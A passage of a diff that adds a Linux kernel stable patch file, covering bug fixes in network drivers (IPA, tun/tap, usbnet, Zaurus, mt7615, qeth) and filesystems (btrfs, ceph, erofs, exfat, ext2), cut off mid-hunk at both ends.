++	trans = ipa_cmd_trans_alloc(ipa, hash_support ? 4 : 2);
+ 	if (!trans) {
+ 		dev_err(&ipa->pdev->dev,
+ 			"no transaction for %s route reset\n",
+@@ -350,12 +350,14 @@ static int ipa_route_reset(struct ipa *ipa, bool modem)
+ 	}
+ 
+ 	ipa_table_reset_add(trans, false, first, count, IPA_MEM_V4_ROUTE);
+-	ipa_table_reset_add(trans, false, first, count,
+-			    IPA_MEM_V4_ROUTE_HASHED);
+-
+ 	ipa_table_reset_add(trans, false, first, count, IPA_MEM_V6_ROUTE);
+-	ipa_table_reset_add(trans, false, first, count,
+-			    IPA_MEM_V6_ROUTE_HASHED);
++
++	if (hash_support) {
++		ipa_table_reset_add(trans, false, first, count,
++				    IPA_MEM_V4_ROUTE_HASHED);
++		ipa_table_reset_add(trans, false, first, count,
++				    IPA_MEM_V6_ROUTE_HASHED);
++	}
+ 
+ 	gsi_trans_commit_wait(trans);
+ 
+diff --git a/drivers/net/tap.c b/drivers/net/tap.c
+index 3c468ef8f245f..8c010857e6d70 100644
+--- a/drivers/net/tap.c
++++ b/drivers/net/tap.c
+@@ -533,7 +533,7 @@ static int tap_open(struct inode *inode, struct file *file)
+ 	q->sock.state = SS_CONNECTED;
+ 	q->sock.file = file;
+ 	q->sock.ops = &tap_socket_ops;
+-	sock_init_data_uid(&q->sock, &q->sk, inode->i_uid);
++	sock_init_data_uid(&q->sock, &q->sk, current_fsuid());
+ 	q->sk.sk_write_space = tap_sock_write_space;
+ 	q->sk.sk_destruct = tap_sock_destruct;
+ 	q->flags = IFF_VNET_HDR | IFF_NO_PI | IFF_TAP;
+diff --git a/drivers/net/tun.c b/drivers/net/tun.c
+index 7c8db8f6f661e..228f5f9ef1dde 100644
+--- a/drivers/net/tun.c
++++ b/drivers/net/tun.c
+@@ -3457,7 +3457,7 @@ static int tun_chr_open(struct inode *inode, struct file * file)
+ 	tfile->socket.file = file;
+ 	tfile->socket.ops = &tun_socket_ops;
+ 
+-	sock_init_data_uid(&tfile->socket, &tfile->sk, inode->i_uid);
++	sock_init_data_uid(&tfile->socket, &tfile->sk, current_fsuid());
+ 
+ 	tfile->sk.sk_write_space = tun_sock_write_space;
+ 	tfile->sk.sk_sndbuf = INT_MAX;
+diff --git a/drivers/net/usb/cdc_ether.c b/drivers/net/usb/cdc_ether.c
+index fb5f59d0d55d7..f07bfe56ec875 100644
+--- a/drivers/net/usb/cdc_ether.c
++++ b/drivers/net/usb/cdc_ether.c
+@@ -618,9 +618,23 @@ static const struct usb_device_id	products[] = {
+ 	.match_flags	=   USB_DEVICE_ID_MATCH_INT_INFO
+ 			  | USB_DEVICE_ID_MATCH_DEVICE,
+ 	.idVendor		= 0x04DD,
++	.idProduct		= 0x8005,   /* A-300 */
++	ZAURUS_FAKE_INTERFACE,
++	.driver_info        = 0,
++}, {
++	.match_flags    =   USB_DEVICE_ID_MATCH_INT_INFO
++			  | USB_DEVICE_ID_MATCH_DEVICE,
++	.idVendor		= 0x04DD,
+ 	.idProduct		= 0x8006,	/* B-500/SL-5600 */
+ 	ZAURUS_MASTER_INTERFACE,
+ 	.driver_info		= 0,
++}, {
++	.match_flags    =   USB_DEVICE_ID_MATCH_INT_INFO
++			  | USB_DEVICE_ID_MATCH_DEVICE,
++	.idVendor		= 0x04DD,
++	.idProduct		= 0x8006,   /* B-500/SL-5600 */
++	ZAURUS_FAKE_INTERFACE,
++	.driver_info        = 0,
+ }, {
+ 	.match_flags    =   USB_DEVICE_ID_MATCH_INT_INFO
+ 			  | USB_DEVICE_ID_MATCH_DEVICE,
+@@ -628,6 +642,13 @@ static const struct usb_device_id	products[] = {
+ 	.idProduct		= 0x8007,	/* C-700 */
+ 	ZAURUS_MASTER_INTERFACE,
+ 	.driver_info		= 0,
++}, {
++	.match_flags    =   USB_DEVICE_ID_MATCH_INT_INFO
++			  | USB_DEVICE_ID_MATCH_DEVICE,
++	.idVendor		= 0x04DD,
++	.idProduct		= 0x8007,   /* C-700 */
++	ZAURUS_FAKE_INTERFACE,
++	.driver_info        = 0,
+ }, {
+ 	.match_flags    =   USB_DEVICE_ID_MATCH_INT_INFO
+ 		 | USB_DEVICE_ID_MATCH_DEVICE,
+diff --git a/drivers/net/usb/usbnet.c b/drivers/net/usb/usbnet.c
+index 64a9a80b23094..405e588f8a3a5 100644
+--- a/drivers/net/usb/usbnet.c
++++ b/drivers/net/usb/usbnet.c
+@@ -1770,6 +1770,10 @@ usbnet_probe (struct usb_interface *udev, const struct usb_device_id *prod)
+ 	} else if (!info->in || !info->out)
+ 		status = usbnet_get_endpoints (dev, udev);
+ 	else {
++		u8 ep_addrs[3] = {
++			info->in + USB_DIR_IN, info->out + USB_DIR_OUT, 0
++		};
++
+ 		dev->in = usb_rcvbulkpipe (xdev, info->in);
+ 		dev->out = usb_sndbulkpipe (xdev, info->out);
+ 		if (!(info->flags & FLAG_NO_SETINT))
+@@ -1779,6 +1783,8 @@ usbnet_probe (struct usb_interface *udev, const struct usb_device_id *prod)
+ 		else
+ 			status = 0;
+ 
++		if (status == 0 && !usb_check_bulk_endpoints(udev, ep_addrs))
++			status = -EINVAL;
+ 	}
+ 	if (status >= 0 && dev->status)
+ 		status = init_status (dev, udev);
+diff --git a/drivers/net/usb/zaurus.c b/drivers/net/usb/zaurus.c
+index 7984f2157d222..df3617c4c44e8 100644
+--- a/drivers/net/usb/zaurus.c
++++ b/drivers/net/usb/zaurus.c
+@@ -289,9 +289,23 @@ static const struct usb_device_id	products [] = {
+ 	.match_flags	=   USB_DEVICE_ID_MATCH_INT_INFO
+ 			  | USB_DEVICE_ID_MATCH_DEVICE,
+ 	.idVendor		= 0x04DD,
++	.idProduct		= 0x8005,	/* A-300 */
++	ZAURUS_FAKE_INTERFACE,
++	.driver_info = (unsigned long)&bogus_mdlm_info,
++}, {
++	.match_flags    =   USB_DEVICE_ID_MATCH_INT_INFO
++			  | USB_DEVICE_ID_MATCH_DEVICE,
++	.idVendor		= 0x04DD,
+ 	.idProduct		= 0x8006,	/* B-500/SL-5600 */
+ 	ZAURUS_MASTER_INTERFACE,
+ 	.driver_info = ZAURUS_PXA_INFO,
++}, {
++	.match_flags    =   USB_DEVICE_ID_MATCH_INT_INFO
++			  | USB_DEVICE_ID_MATCH_DEVICE,
++	.idVendor		= 0x04DD,
++	.idProduct		= 0x8006,	/* B-500/SL-5600 */
++	ZAURUS_FAKE_INTERFACE,
++	.driver_info = (unsigned long)&bogus_mdlm_info,
+ }, {
+ 	.match_flags    =   USB_DEVICE_ID_MATCH_INT_INFO
+ 	          | USB_DEVICE_ID_MATCH_DEVICE,
+@@ -299,6 +313,13 @@ static const struct usb_device_id	products [] = {
+ 	.idProduct		= 0x8007,	/* C-700 */
+ 	ZAURUS_MASTER_INTERFACE,
+ 	.driver_info = ZAURUS_PXA_INFO,
++}, {
++	.match_flags    =   USB_DEVICE_ID_MATCH_INT_INFO
++			  | USB_DEVICE_ID_MATCH_DEVICE,
++	.idVendor		= 0x04DD,
++	.idProduct		= 0x8007,	/* C-700 */
++	ZAURUS_FAKE_INTERFACE,
++	.driver_info = (unsigned long)&bogus_mdlm_info,
+ }, {
+ 	.match_flags    =   USB_DEVICE_ID_MATCH_INT_INFO
+ 		 | USB_DEVICE_ID_MATCH_DEVICE,
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7615/eeprom.c b/drivers/net/wireless/mediatek/mt76/mt7615/eeprom.c
+index 6dbaaf95ee385..2092aa373ab32 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7615/eeprom.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7615/eeprom.c
+@@ -123,12 +123,12 @@ mt7615_eeprom_parse_hw_band_cap(struct mt7615_dev *dev)
+ 	case MT_EE_5GHZ:
+ 		dev->mphy.cap.has_5ghz = true;
+ 		break;
+-	case MT_EE_2GHZ:
+-		dev->mphy.cap.has_2ghz = true;
+-		break;
+ 	case MT_EE_DBDC:
+ 		dev->dbdc_support = true;
+ 		fallthrough;
++	case MT_EE_2GHZ:
++		dev->mphy.cap.has_2ghz = true;
++		break;
+ 	default:
+ 		dev->mphy.cap.has_2ghz = true;
+ 		dev->mphy.cap.has_5ghz = true;
+diff --git a/drivers/s390/net/qeth_core.h b/drivers/s390/net/qeth_core.h
+index 1d195429753dd..613eab7297046 100644
+--- a/drivers/s390/net/qeth_core.h
++++ b/drivers/s390/net/qeth_core.h
+@@ -716,7 +716,6 @@ struct qeth_card_info {
+ 	u16 chid;
+ 	u8 ids_valid:1; /* cssid,iid,chid */
+ 	u8 dev_addr_is_registered:1;
+-	u8 open_when_online:1;
+ 	u8 promisc_mode:1;
+ 	u8 use_v1_blkt:1;
+ 	u8 is_vm_nic:1;
+diff --git a/drivers/s390/net/qeth_core_main.c b/drivers/s390/net/qeth_core_main.c
+index 8bd9fd51208c9..ae4b6d24bc902 100644
+--- a/drivers/s390/net/qeth_core_main.c
++++ b/drivers/s390/net/qeth_core_main.c
+@@ -5371,8 +5371,6 @@ int qeth_set_offline(struct qeth_card *card, const struct qeth_discipline *disc,
+ 	qeth_clear_ipacmd_list(card);
+ 
+ 	rtnl_lock();
+-	card->info.open_when_online = card->dev->flags & IFF_UP;
+-	dev_close(card->dev);
+ 	netif_device_detach(card->dev);
+ 	netif_carrier_off(card->dev);
+ 	rtnl_unlock();
+diff --git a/drivers/s390/net/qeth_l2_main.c b/drivers/s390/net/qeth_l2_main.c
+index c6ded3fdd715c..9ef2118fc7a2a 100644
+--- a/drivers/s390/net/qeth_l2_main.c
++++ b/drivers/s390/net/qeth_l2_main.c
+@@ -2387,9 +2387,12 @@ static int qeth_l2_set_online(struct qeth_card *card, bool carrier_ok)
+ 		qeth_enable_hw_features(dev);
+ 		qeth_l2_enable_brport_features(card);
+ 
+-		if (card->info.open_when_online) {
+-			card->info.open_when_online = 0;
+-			dev_open(dev, NULL);
++		if (netif_running(dev)) {
++			local_bh_disable();
++			napi_schedule(&card->napi);
++			/* kick-start the NAPI softirq: */
++			local_bh_enable();
++			qeth_l2_set_rx_mode(dev);
+ 		}
+ 		rtnl_unlock();
+ 	}
+diff --git a/drivers/s390/net/qeth_l3_main.c b/drivers/s390/net/qeth_l3_main.c
+index d8487a10cd555..c0f30cefec102 100644
+--- a/drivers/s390/net/qeth_l3_main.c
++++ b/drivers/s390/net/qeth_l3_main.c
+@@ -2017,9 +2017,11 @@ static int qeth_l3_set_online(struct qeth_card *card, bool carrier_ok)
+ 		netif_device_attach(dev);
+ 		qeth_enable_hw_features(dev);
+ 
+-		if (card->info.open_when_online) {
+-			card->info.open_when_online = 0;
+-			dev_open(dev, NULL);
++		if (netif_running(dev)) {
++			local_bh_disable();
++			napi_schedule(&card->napi);
++			/* kick-start the NAPI softirq: */
++			local_bh_enable();
+ 		}
+ 		rtnl_unlock();
+ 	}
+diff --git a/drivers/s390/scsi/zfcp_fc.c b/drivers/s390/scsi/zfcp_fc.c
+index 77917b3398709..a64def01d8249 100644
+--- a/drivers/s390/scsi/zfcp_fc.c
++++ b/drivers/s390/scsi/zfcp_fc.c
+@@ -534,8 +534,7 @@ static void zfcp_fc_adisc_handler(void *data)
+ 
+ 	/* re-init to undo drop from zfcp_fc_adisc() */
+ 	port->d_id = ntoh24(adisc_resp->adisc_port_id);
+-	/* port is good, unblock rport without going through erp */
+-	zfcp_scsi_schedule_rport_register(port);
++	/* port is still good, nothing to do */
+  out:
+ 	atomic_andnot(ZFCP_STATUS_PORT_LINK_TEST, &port->status);
+ 	put_device(&port->dev);
+@@ -595,9 +594,6 @@ void zfcp_fc_link_test_work(struct work_struct *work)
+ 	int retval;
+ 
+ 	set_worker_desc("zadisc%16llx", port->wwpn); /* < WORKER_DESC_LEN=24 */
+-	get_device(&port->dev);
+-	port->rport_task = RPORT_DEL;
+-	zfcp_scsi_rport_work(&port->rport_work);
+ 
+ 	/* only issue one test command at one time per port */
+ 	if (atomic_read(&port->status) & ZFCP_STATUS_PORT_LINK_TEST)
+diff --git a/drivers/scsi/storvsc_drv.c b/drivers/scsi/storvsc_drv.c
+index 5284f9a0b826e..54a1b8514f04b 100644
+--- a/drivers/scsi/storvsc_drv.c
++++ b/drivers/scsi/storvsc_drv.c
+@@ -365,6 +365,7 @@ static void storvsc_on_channel_callback(void *context);
+ #define STORVSC_FC_MAX_LUNS_PER_TARGET			255
+ #define STORVSC_FC_MAX_TARGETS				128
+ #define STORVSC_FC_MAX_CHANNELS				8
++#define STORVSC_FC_MAX_XFER_SIZE			((u32)(512 * 1024))
+ 
+ #define STORVSC_IDE_MAX_LUNS_PER_TARGET			64
+ #define STORVSC_IDE_MAX_TARGETS				1
+@@ -2002,6 +2003,9 @@ static int storvsc_probe(struct hv_device *device,
+ 	 * protecting it from any weird value.
+ 	 */
+ 	max_xfer_bytes = round_down(stor_device->max_transfer_bytes, HV_HYP_PAGE_SIZE);
++	if (is_fc)
++		max_xfer_bytes = min(max_xfer_bytes, STORVSC_FC_MAX_XFER_SIZE);
++
+ 	/* max_hw_sectors_kb */
+ 	host->max_sectors = max_xfer_bytes >> 9;
+ 	/*
+diff --git a/fs/btrfs/block-group.c b/fs/btrfs/block-group.c
+index d93e8735ab1f9..d7aad5e8ee377 100644
+--- a/fs/btrfs/block-group.c
++++ b/fs/btrfs/block-group.c
+@@ -494,12 +494,16 @@ static void fragment_free_space(struct btrfs_block_group *block_group)
+  * used yet since their free space will be released as soon as the transaction
+  * commits.
+  */
+-u64 add_new_free_space(struct btrfs_block_group *block_group, u64 start, u64 end)
++int add_new_free_space(struct btrfs_block_group *block_group, u64 start, u64 end,
++		       u64 *total_added_ret)
+ {
+ 	struct btrfs_fs_info *info = block_group->fs_info;
+-	u64 extent_start, extent_end, size, total_added = 0;
++	u64 extent_start, extent_end, size;
+ 	int ret;
+ 
++	if (total_added_ret)
++		*total_added_ret = 0;
++
+ 	while (start < end) {
+ 		ret = find_first_extent_bit(&info->excluded_extents, start,
+ 					    &extent_start, &extent_end,
+@@ -512,10 +516,12 @@ u64 add_new_free_space(struct btrfs_block_group *block_group, u64 start, u64 end
+ 			start = extent_end + 1;
+ 		} else if (extent_start > start && extent_start < end) {
+ 			size = extent_start - start;
+-			total_added += size;
+ 			ret = btrfs_add_free_space_async_trimmed(block_group,
+ 								 start, size);
+-			BUG_ON(ret); /* -ENOMEM or logic error */
++			if (ret)
++				return ret;
++			if (total_added_ret)
++				*total_added_ret += size;
+ 			start = extent_end + 1;
+ 		} else {
+ 			break;
+@@ -524,13 +530,15 @@ u64 add_new_free_space(struct btrfs_block_group *block_group, u64 start, u64 end
+ 
+ 	if (start < end) {
+ 		size = end - start;
+-		total_added += size;
+ 		ret = btrfs_add_free_space_async_trimmed(block_group, start,
+ 							 size);
+-		BUG_ON(ret); /* -ENOMEM or logic error */
++		if (ret)
++			return ret;
++		if (total_added_ret)
++			*total_added_ret += size;
+ 	}
+ 
+-	return total_added;
++	return 0;
+ }
+ 
+ static int load_extent_tree_free(struct btrfs_caching_control *caching_ctl)
+@@ -637,8 +645,13 @@ next:
+ 
+ 		if (key.type == BTRFS_EXTENT_ITEM_KEY ||
+ 		    key.type == BTRFS_METADATA_ITEM_KEY) {
+-			total_found += add_new_free_space(block_group, last,
+-							  key.objectid);
++			u64 space_added;
++
++			ret = add_new_free_space(block_group, last, key.objectid,
++						 &space_added);
++			if (ret)
++				goto out;
++			total_found += space_added;
+ 			if (key.type == BTRFS_METADATA_ITEM_KEY)
+ 				last = key.objectid +
+ 					fs_info->nodesize;
+@@ -653,11 +666,10 @@ next:
+ 		}
+ 		path->slots[0]++;
+ 	}
+-	ret = 0;
+-
+-	total_found += add_new_free_space(block_group, last,
+-				block_group->start + block_group->length);
+ 
++	ret = add_new_free_space(block_group, last,
++				 block_group->start + block_group->length,
++				 NULL);
+ out:
+ 	btrfs_free_path(path);
+ 	return ret;
+@@ -2101,9 +2113,11 @@ static int read_one_block_group(struct btrfs_fs_info *info,
+ 		btrfs_free_excluded_extents(cache);
+ 	} else if (cache->used == 0) {
+ 		cache->cached = BTRFS_CACHE_FINISHED;
+-		add_new_free_space(cache, cache->start,
+-				   cache->start + cache->length);
++		ret = add_new_free_space(cache, cache->start,
++					 cache->start + cache->length, NULL);
+ 		btrfs_free_excluded_extents(cache);
++		if (ret)
++			goto error;
+ 	}
+ 
+ 	ret = btrfs_add_block_group_cache(info, cache);
+@@ -2529,9 +2543,12 @@ struct btrfs_block_group *btrfs_make_block_group(struct btrfs_trans_handle *tran
+ 		return ERR_PTR(ret);
+ 	}
+ 
+-	add_new_free_space(cache, chunk_offset, chunk_offset + size);
+-
++	ret = add_new_free_space(cache, chunk_offset, chunk_offset + size, NULL);
+ 	btrfs_free_excluded_extents(cache);
++	if (ret) {
++		btrfs_put_block_group(cache);
++		return ERR_PTR(ret);
++	}
+ 
+ 	/*
+ 	 * Ensure the corresponding space_info object is created and
+diff --git a/fs/btrfs/block-group.h b/fs/btrfs/block-group.h
+index 8fb14b99a1d1f..0a3d386823583 100644
+--- a/fs/btrfs/block-group.h
++++ b/fs/btrfs/block-group.h
+@@ -284,8 +284,8 @@ int btrfs_cache_block_group(struct btrfs_block_group *cache, bool wait);
+ void btrfs_put_caching_control(struct btrfs_caching_control *ctl);
+ struct btrfs_caching_control *btrfs_get_caching_control(
+ 		struct btrfs_block_group *cache);
+-u64 add_new_free_space(struct btrfs_block_group *block_group,
+-		       u64 start, u64 end);
++int add_new_free_space(struct btrfs_block_group *block_group,
++		       u64 start, u64 end, u64 *total_added_ret);
+ struct btrfs_trans_handle *btrfs_start_trans_remove_block_group(
+ 				struct btrfs_fs_info *fs_info,
+ 				const u64 chunk_offset);
+diff --git a/fs/btrfs/free-space-tree.c b/fs/btrfs/free-space-tree.c
+index a07450f64abb1..a207db9322264 100644
+--- a/fs/btrfs/free-space-tree.c
++++ b/fs/btrfs/free-space-tree.c
+@@ -1510,9 +1510,13 @@ static int load_free_space_bitmaps(struct btrfs_caching_control *caching_ctl,
+ 			if (prev_bit == 0 && bit == 1) {
+ 				extent_start = offset;
+ 			} else if (prev_bit == 1 && bit == 0) {
+-				total_found += add_new_free_space(block_group,
+-								  extent_start,
+-								  offset);
++				u64 space_added;
++
++				ret = add_new_free_space(block_group, extent_start,
++							 offset, &space_added);
++				if (ret)
++					goto out;
++				total_found += space_added;
+ 				if (total_found > CACHING_CTL_WAKE_UP) {
+ 					total_found = 0;
+ 					wake_up(&caching_ctl->wait);
+@@ -1524,8 +1528,9 @@ static int load_free_space_bitmaps(struct btrfs_caching_control *caching_ctl,
+ 		}
+ 	}
+ 	if (prev_bit == 1) {
+-		total_found += add_new_free_space(block_group, extent_start,
+-						  end);
++		ret = add_new_free_space(block_group, extent_start, end, NULL);
++		if (ret)
++			goto out;
+ 		extent_count++;
+ 	}
+ 
+@@ -1564,6 +1569,8 @@ static int load_free_space_extents(struct btrfs_caching_control *caching_ctl,
+ 	end = block_group->start + block_group->length;
+ 
+ 	while (1) {
++		u64 space_added;
++
+ 		ret = btrfs_next_item(root, path);
+ 		if (ret < 0)
+ 			goto out;
+@@ -1578,8 +1585,11 @@ static int load_free_space_extents(struct btrfs_caching_control *caching_ctl,
+ 		ASSERT(key.type == BTRFS_FREE_SPACE_EXTENT_KEY);
+ 		ASSERT(key.objectid < end && key.objectid + key.offset <= end);
+ 
+-		total_found += add_new_free_space(block_group, key.objectid,
+-						  key.objectid + key.offset);
++		ret = add_new_free_space(block_group, key.objectid,
++					 key.objectid + key.offset, &space_added);
++		if (ret)
++			goto out;
++		total_found += space_added;
+ 		if (total_found > CACHING_CTL_WAKE_UP) {
+ 			total_found = 0;
+ 			wake_up(&caching_ctl->wait);
+diff --git a/fs/ceph/mds_client.c b/fs/ceph/mds_client.c
+index 1989c8deea55a..dcabe2783edfe 100644
+--- a/fs/ceph/mds_client.c
++++ b/fs/ceph/mds_client.c
+@@ -4758,7 +4758,7 @@ static void delayed_work(struct work_struct *work)
+ 
+ 	dout("mdsc delayed_work\n");
+ 
+-	if (mdsc->stopping)
++	if (mdsc->stopping >= CEPH_MDSC_STOPPING_FLUSHED)
+ 		return;
+ 
+ 	mutex_lock(&mdsc->mutex);
+@@ -4937,7 +4937,7 @@ void send_flush_mdlog(struct ceph_mds_session *s)
+ void ceph_mdsc_pre_umount(struct ceph_mds_client *mdsc)
+ {
+ 	dout("pre_umount\n");
+-	mdsc->stopping = 1;
++	mdsc->stopping = CEPH_MDSC_STOPPING_BEGIN;
+ 
+ 	ceph_mdsc_iterate_sessions(mdsc, send_flush_mdlog, true);
+ 	ceph_mdsc_iterate_sessions(mdsc, lock_unlock_session, false);
+diff --git a/fs/ceph/mds_client.h b/fs/ceph/mds_client.h
+index 18b026b1ac63f..9a80658f41679 100644
+--- a/fs/ceph/mds_client.h
++++ b/fs/ceph/mds_client.h
+@@ -380,6 +380,11 @@ struct cap_wait {
+ 	int			want;
+ };
+ 
++enum {
++       CEPH_MDSC_STOPPING_BEGIN = 1,
++       CEPH_MDSC_STOPPING_FLUSHED = 2,
++};
++
+ /*
+  * mds client state
+  */
+diff --git a/fs/ceph/super.c b/fs/ceph/super.c
+index 3fc48b43cab0a..a5f52013314d6 100644
+--- a/fs/ceph/super.c
++++ b/fs/ceph/super.c
+@@ -1374,6 +1374,16 @@ static void ceph_kill_sb(struct super_block *s)
+ 	ceph_mdsc_pre_umount(fsc->mdsc);
+ 	flush_fs_workqueues(fsc);
+ 
++	/*
++	 * Though the kill_anon_super() will finally trigger the
++	 * sync_filesystem() anyway, we still need to do it here
++	 * and then bump the stage of shutdown to stop the work
++	 * queue as earlier as possible.
++	 */
++	sync_filesystem(s);
++
++	fsc->mdsc->stopping = CEPH_MDSC_STOPPING_FLUSHED;
++
+ 	kill_anon_super(s);
+ 
+ 	fsc->client->extra_mon_dispatch = NULL;
+diff --git a/fs/erofs/zdata.c b/fs/erofs/zdata.c
+index 533e612b6a486..361f3c29897e8 100644
+--- a/fs/erofs/zdata.c
++++ b/fs/erofs/zdata.c
+@@ -989,10 +989,11 @@ static void z_erofs_do_decompressed_bvec(struct z_erofs_decompress_backend *be,
+ 					 struct z_erofs_bvec *bvec)
+ {
+ 	struct z_erofs_bvec_item *item;
++	unsigned int pgnr;
+ 
+-	if (!((bvec->offset + be->pcl->pageofs_out) & ~PAGE_MASK)) {
+-		unsigned int pgnr;
+-
++	if (!((bvec->offset + be->pcl->pageofs_out) & ~PAGE_MASK) &&
++	    (bvec->end == PAGE_SIZE ||
++	     bvec->offset + bvec->end == be->pcl->length)) {
+ 		pgnr = (bvec->offset + be->pcl->pageofs_out) >> PAGE_SHIFT;
+ 		DBG_BUGON(pgnr >= be->nr_pages);
+ 		if (!be->decompressed_pages[pgnr]) {
+diff --git a/fs/exfat/balloc.c b/fs/exfat/balloc.c
+index 9f42f25fab920..e918decb37358 100644
+--- a/fs/exfat/balloc.c
++++ b/fs/exfat/balloc.c
+@@ -69,7 +69,7 @@ static int exfat_allocate_bitmap(struct super_block *sb,
+ 	}
+ 	sbi->map_sectors = ((need_map_size - 1) >>
+ 			(sb->s_blocksize_bits)) + 1;
+-	sbi->vol_amap = kmalloc_array(sbi->map_sectors,
++	sbi->vol_amap = kvmalloc_array(sbi->map_sectors,
+ 				sizeof(struct buffer_head *), GFP_KERNEL);
+ 	if (!sbi->vol_amap)
+ 		return -ENOMEM;
+@@ -84,7 +84,7 @@ static int exfat_allocate_bitmap(struct super_block *sb,
+ 			while (j < i)
+ 				brelse(sbi->vol_amap[j++]);
+ 
+-			kfree(sbi->vol_amap);
++			kvfree(sbi->vol_amap);
+ 			sbi->vol_amap = NULL;
+ 			return -EIO;
+ 		}
+@@ -138,7 +138,7 @@ void exfat_free_bitmap(struct exfat_sb_info *sbi)
+ 	for (i = 0; i < sbi->map_sectors; i++)
+ 		__brelse(sbi->vol_amap[i]);
+ 
+-	kfree(sbi->vol_amap);
++	kvfree(sbi->vol_amap);
+ }
+ 
+ int exfat_set_bitmap(struct inode *inode, unsigned int clu, bool sync)
+diff --git a/fs/exfat/dir.c b/fs/exfat/dir.c
+index 15c4f901be369..51b03b0dd5f75 100644
+--- a/fs/exfat/dir.c
++++ b/fs/exfat/dir.c
+@@ -34,6 +34,7 @@ static void exfat_get_uniname_from_ext_entry(struct super_block *sb,
+ {
+ 	int i;
+ 	struct exfat_entry_set_cache *es;
++	unsigned int uni_len = 0, len;
+ 
+ 	es = exfat_get_dentry_set(sb, p_dir, entry, ES_ALL_ENTRIES);
+ 	if (!es)
+@@ -52,7 +53,10 @@ static void exfat_get_uniname_from_ext_entry(struct super_block *sb,
+ 		if (exfat_get_entry_type(ep) != TYPE_EXTEND)
+ 			break;
+ 
+-		exfat_extract_uni_name(ep, uniname);
++		len = exfat_extract_uni_name(ep, uniname);
++		uni_len += len;
++		if (len != EXFAT_FILE_NAME_LEN || uni_len >= MAX_NAME_LENGTH)
++			break;
+ 		uniname += EXFAT_FILE_NAME_LEN;
+ 	}
+ 
+@@ -210,7 +214,10 @@ static void exfat_free_namebuf(struct exfat_dentry_namebuf *nb)
+ 	exfat_init_namebuf(nb);
+ }
+ 
+-/* skip iterating emit_dots when dir is empty */
++/*
++ * Before calling dir_emit*(), sbi->s_lock should be released
++ * because page fault can occur in dir_emit*().
++ */
+ #define ITER_POS_FILLED_DOTS    (2)
+ static int exfat_iterate(struct file *file, struct dir_context *ctx)
+ {
+@@ -225,11 +232,10 @@ static int exfat_iterate(struct file *file, struct dir_context *ctx)
+ 	int err = 0, fake_offset = 0;
+ 
+ 	exfat_init_namebuf(nb);
+-	mutex_lock(&EXFAT_SB(sb)->s_lock);
+ 
+ 	cpos = ctx->pos;
+ 	if (!dir_emit_dots(file, ctx))
+-		goto unlock;
++		goto out;
+ 
+ 	if (ctx->pos == ITER_POS_FILLED_DOTS) {
+ 		cpos = 0;
+@@ -241,16 +247,18 @@ static int exfat_iterate(struct file *file, struct dir_context *ctx)
+ 	/* name buffer should be allocated before use */
+ 	err = exfat_alloc_namebuf(nb);
+ 	if (err)
+-		goto unlock;
++		goto out;
+ get_new:
++	mutex_lock(&EXFAT_SB(sb)->s_lock);
++
+ 	if (ei->flags == ALLOC_NO_FAT_CHAIN && cpos >= i_size_read(inode))
+ 		goto end_of_dir;
+ 
+ 	err = exfat_readdir(inode, &cpos, &de);
+ 	if (err) {
+ 		/*
+-		 * At least we tried to read a sector.  Move cpos to next sector
+-		 * position (should be aligned).
++		 * At least we tried to read a sector.
++		 * Move cpos to next sector position (should be aligned).
+ 		 */
+ 		if (err == -EIO) {
+ 			cpos += 1 << (sb->s_blocksize_bits);
+@@ -273,16 +281,10 @@ get_new:
+ 		inum = iunique(sb, EXFAT_ROOT_INO);
+ 	}
+ 
+-	/*
+-	 * Before calling dir_emit(), sb_lock should be released.
+-	 * Because page fault can occur in dir_emit() when the size
+-	 * of buffer given from user is larger than one page size.
+-	 */
+ 	mutex_unlock(&EXFAT_SB(sb)->s_lock);
+ 	if (!dir_emit(ctx, nb->lfn, strlen(nb->lfn), inum,
+ 			(de.attr & ATTR_SUBDIR) ? DT_DIR : DT_REG))
+-		goto out_unlocked;
+-	mutex_lock(&EXFAT_SB(sb)->s_lock);
++		goto out;
+ 	ctx->pos = cpos;
+ 	goto get_new;
+ 
+@@ -290,9 +292,8 @@ end_of_dir:
+ 	if (!cpos && fake_offset)
+ 		cpos = ITER_POS_FILLED_DOTS;
+ 	ctx->pos = cpos;
+-unlock:
+ 	mutex_unlock(&EXFAT_SB(sb)->s_lock);
+-out_unlocked:
++out:
+ 	/*
+ 	 * To improve performance, free namebuf after unlock sb_lock.
+ 	 * If namebuf is not allocated, this function do nothing
+@@ -1027,7 +1028,8 @@ rewind:
+ 			if (entry_type == TYPE_EXTEND) {
+ 				unsigned short entry_uniname[16], unichar;
+ 
+-				if (step != DIRENT_STEP_NAME) {
++				if (step != DIRENT_STEP_NAME ||
++				    name_len >= MAX_NAME_LENGTH) {
+ 					step = DIRENT_STEP_FILE;
+ 					continue;
+ 				}
+diff --git a/fs/ext2/ext2.h b/fs/ext2/ext2.h
+index dc5dcb78bc27f..2c95916aead88 100644
+--- a/fs/ext2/ext2.h
++++ b/fs/ext2/ext2.h
+@@ -70,10 +70,7 @@ struct mb_cache;
+  * second extended-fs super-block data in memory
+  */
+ struct ext2_sb_info {
+-	unsigned long s_frag_size;	/* Size of a fragment in bytes */
+-	unsigned long s_frags_per_block;/* Number of fragments per block */
+ 	unsigned long s_inodes_per_block;/* Number of inodes per block */
+-	unsigned long s_frags_per_group;/* Number of fragments in a group */
+ 	unsigned long s_blocks_per_group;/* Number of blocks in a group */
+ 	unsigned long s_inodes_per_group;/* Number of inodes in a group */
+ 	unsigned long s_itb_per_group;	/* Number of inode table blocks per group */
+@@ -188,15 +185,6 @@ static inline struct ext2_sb_info *EXT2_SB(struct super_block *sb)
+ #define EXT2_INODE_SIZE(s)		(EXT2_SB(s)->s_inode_size)
+ #define EXT2_FIRST_INO(s)		(EXT2_SB(s)->s_first_ino)
+ 
+-/*
+- * Macro-instructions used to manage fragments
+- */
+-#define EXT2_MIN_FRAG_SIZE		1024
+-#define	EXT2_MAX_FRAG_SIZE		4096
+-#define EXT2_MIN_FRAG_LOG_SIZE		  10
+-#define EXT2_FRAG_SIZE(s)		(EXT2_SB(s)->s_frag_size)
+-#define EXT2_FRAGS_PER_BLOCK(s)		(EXT2_SB(s)->s_frags_per_block)
+-
+ /*
+  * Structure of a blocks group descriptor
+  */
+diff --git a/fs/ext2/super.c b/fs/ext2/super.c
+index 3feea4b31fa7e..99b26fe20d17c 100644
+--- a/fs/ext2/super.c
++++ b/fs/ext2/super.c
+@@ -668,10 +668,9 @@ static int ext2_setup_super (struct super_block * sb,
